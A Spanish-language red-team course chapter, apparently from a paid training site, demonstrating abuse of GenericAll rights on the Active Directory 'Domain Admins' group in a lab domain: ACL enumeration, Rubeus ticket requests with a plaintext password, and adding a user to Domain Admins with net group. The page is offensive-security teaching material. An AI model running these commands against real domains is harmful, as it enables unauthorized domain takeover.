GenericAll sobre Grupo

Para llevar tu aprendizaje al siguiente nivel y practicar estas técnicas de manera segura y efectiva, te invitamos a adquirir acceso premium a nuestro material de curso. No pierdas esta oportunidad de profundizar tus conocimientos. Para más información y adquirir tu acceso, visita nuestro canal de ventas: https://wa.link/ej3kiu. ¡Te esperamos para empezar este viaje juntos!

Contexto

En el contexto de las operaciones de un Red Team, el análisis de los permisos y los roles de los usuarios en un entorno de Active Directory (AD) es crucial para identificar potenciales vectores de ataque y vulnerabilidades. Este capítulo se enfoca en un escenario hipotético donde el usuario "groupwrite.user" en el dominio "SPARTANCYBERSEC" ha sido comprometido. Utilizaremos una salida de PowerShell típica para ilustrar cómo este compromiso podría ser explotado para escalar privilegios o realizar movimientos laterales.

Iniciamos realizando una enumeracion sobre el siguiente grupo:

PS C:\Users\admin\Desktop\ADModule> import-module .\Microsoft.ActiveDirectory.Management.dll

PS C:\Users\admin\Desktop> Get-ADGroup "Domain Admins" -Properties * | select -ExpandProperty ntSecurityDescriptor | Format-List

Path   :
Owner  : SPARTANCYBERSEC\Domain Admins
Group  : SPARTANCYBERSEC\Domain Admins
Access : NT AUTHORITY\Authenticated Users Allow
         NT AUTHORITY\SYSTEM Allow
         BUILTIN\Administrators Allow
         SPARTANCYBERSEC\Domain Admins Allow
         SPARTANCYBERSEC\Enterprise Admins Allow
         SPARTANCYBERSEC\groupwrite.user Allow
         Everyone Allow
         NT AUTHORITY\SELF Allow
         NT AUTHORITY\SELF Allow
         BUILTIN\Pre-Windows 2000 Compatible Access Allow
         BUILTIN\Windows Authorization Access Group Allow
         BUILTIN\Terminal Server License Servers Allow
         BUILTIN\Terminal Server License Servers Allow
         SPARTANCYBERSEC\Cert Publishers Allow
Audit  :
Sddl   : O:DAG:DAD:PAI(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)(A;;CCDCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPLOCRRCWDWO;;;DA)(A;;CCDCLCSWRPWPLOCRRCWDWO;;;S-1-5-21-1861162130-2580302541-221646211-519)(A;CI;CCDCLCS-RESUMIDO)

La linea SPARTANCYBERSEC\groupwrite.user Allow indica que "groupwrite.user" tiene permisos asignados en el grupo "Domain Admins". En un entorno de AD, tener permisos sobre este grupo es significativo, ya que los "Domain Admins" tienen control total sobre el dominio.

Por lo anterior, se procede a suplantar el usuario:

PS C:\Users\admin\Desktop\SHARED>  ./Rubeus.exe asktgt /user:groupwrite.user /password:Password@1 /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.3

[*] Action: Ask TGT

[*] Using rc4_hmac hash: 64FBAE31CC352FC26AF97CBDEF151E03
[*] Building AS-REQ (w/ preauth) for: 'spartancybersec.corp\groupwrite.user'
[*] Using domain controller: 10.0.1.100:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIGEDCCBgygAwIBBaEDAgEWooIFBjCCBQJhggT+MIIE+qADAgEFoRYbFFNQQVJUQU5DWUJFUlNFQy5D
T1JQoikwJ6ADAgECoSAwHhsGa3JidGd0GxRzcGFydGFuY3liZXJzZWMuY29ycKOCBK4wggSqoAMCARKh
3NTRapxEYDzIwMjMxMTIxMDQ1NzU0WqgWGxRTUEFSVEFOQ1lCRVJTRUMuQ09SUKkpMCegAwIBAqEgMB4bBmtyYnRndBsUc3BhcnRhbmN5YmVyc2VjLmNvcnA+RESUMIDO
[+] Ticket successfully imported!

  ServiceName              :  krbtgt/spartancybersec.corp
  ServiceRealm             :  SPARTANCYBERSEC.CORP
  UserName                 :  groupwrite.user (NT_PRINCIPAL)
  UserRealm                :  SPARTANCYBERSEC.CORP
  StartTime                :  11/14/2023 4:57:54 AM
  EndTime                  :  11/14/2023 2:57:54 PM
  RenewTill                :  11/21/2023 4:57:54 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  XIGRA7/DQHsJaYNuRFu7ag==
  ASREP (key)              :  64FBAE31CC352FC26AF97CBDEF151E03

Luego de lo anterior, tendremos un ticket en cache del usuario groupwrite.user:

PS C:\Users\admin\Desktop\SHARED> klist

Current LogonId is 0:0x30685

Cached Tickets: (4)

#0>     Client: groupwrite.user @ SPARTANCYBERSEC.CORP
        Server: krbtgt/spartancybersec.corp @ SPARTANCYBERSEC.CORP
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 11/14/2023 4:57:54 (local)
        End Time:   11/14/2023 14:57:54 (local)
        Renew Time: 11/21/2023 4:57:54 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

#1>     Client: groupwrite.user @ SPARTANCYBERSEC.CORP
        Server: krbtgt/SPARTANCYBERSEC.CORP @ SPARTANCYBERSEC.CORP
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
        Start Time: 11/14/2023 4:47:34 (local)
        End Time:   11/14/2023 14:47:28 (local)
        Renew Time: 11/21/2023 4:47:28 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x2 -> DELEGATION
        Kdc Called: First-DC.spartancybersec.corp

#2>     Client: groupwrite.user @ SPARTANCYBERSEC.CORP
        Server: ldap/First-DC.spartancybersec.corp/spartancybersec.corp @ SPARTANCYBERSEC.CORP
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
        Start Time: 11/14/2023 4:57:54 (local)
        End Time:   11/14/2023 14:47:28 (local)
        Renew Time: 11/21/2023 4:47:28 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called: First-DC.spartancybersec.corp

#3>     Client: groupwrite.user @ SPARTANCYBERSEC.CORP
        Server: cifs/First-DC.spartancybersec.corp @ SPARTANCYBERSEC.CORP
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
        Start Time: 11/14/2023 4:47:34 (local)
        End Time:   11/14/2023 14:47:28 (local)
        Renew Time: 11/21/2023 4:47:28 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called: First-DC.spartancybersec.corp

Posteriormente, vamos a validar los miembros del grupo afectado:

PS C:\> net group "domain admins" /domain
The request will be processed at a domain controller for domain spartancybersec.corp.

Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
admin                    Administrator            sephiroth
The command completed successfully.

Y finalizamos, realizando nuestro ataque con el comando de net:

PS C:\> net group "domain admins" user.hacked /add /domain
The request will be processed at a domain controller for domain spartancybersec.corp.

The command completed successfully.

Despues de lo anterior, podemos validar el resultado con el siguiente comando:

PS C:\> net group "domain admins" /domain
The request will be processed at a domain controller for domain spartancybersec.corp.

Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
admin                    Administrator            sephiroth
user.hacked
The command completed successfully.

AnteriorWriteDacl sobre Computador SiguienteGenericAll sobre usuario

Última actualización hace 1 año

¿Te fue útil?

PS C:\Users\admin\Desktop\SHARED> klist Current LogonId is 0:0x30685 Cached Tickets: (4) #0> Client: groupwrite.user @ SPARTANCYBERSEC.CORP Server: krbtgt/spartancybersec.corp @ SPARTANCYBERSEC.CORP KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize Start Time: 11/14/2023 4:57:54 (local) End Time: 11/14/2023 14:57:54 (local) Renew Time: 11/21/2023 4:57:54 (local) Session Key Type: RSADSI RC4-HMAC(NT) Cache Flags: 0x1 -> PRIMARY Kdc Called: #1> Client: groupwrite.user @ SPARTANCYBERSEC.CORP Server: krbtgt/SPARTANCYBERSEC.CORP @ SPARTANCYBERSEC.CORP KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize Start Time: 11/14/2023 4:47:34 (local) End Time: 11/14/2023 14:47:28 (local) Renew Time: 11/21/2023 4:47:28 (local) Session Key Type: AES-256-CTS-HMAC-SHA1-96 Cache Flags: 0x2 -> DELEGATION Kdc Called: First-DC.spartancybersec.corp #2> Client: groupwrite.user @ SPARTANCYBERSEC.CORP Server: ldap/First-DC.spartancybersec.corp/spartancybersec.corp @ SPARTANCYBERSEC.CORP KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize Start Time: 11/14/2023 4:57:54 (local) End Time: 11/14/2023 14:47:28 (local) Renew Time: 11/21/2023 4:47:28 (local) Session Key Type: AES-256-CTS-HMAC-SHA1-96 Cache Flags: 0 Kdc Called: First-DC.spartancybersec.corp #3> Client: groupwrite.user @ SPARTANCYBERSEC.CORP Server: cifs/First-DC.spartancybersec.corp @ SPARTANCYBERSEC.CORP KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize Start Time: 11/14/2023 4:47:34 (local) End Time: 11/14/2023 14:47:28 (local) Renew Time: 11/21/2023 4:47:28 (local) Session Key Type: AES-256-CTS-HMAC-SHA1-96 Cache Flags: 0 Kdc Called: First-DC.spartancybersec.corp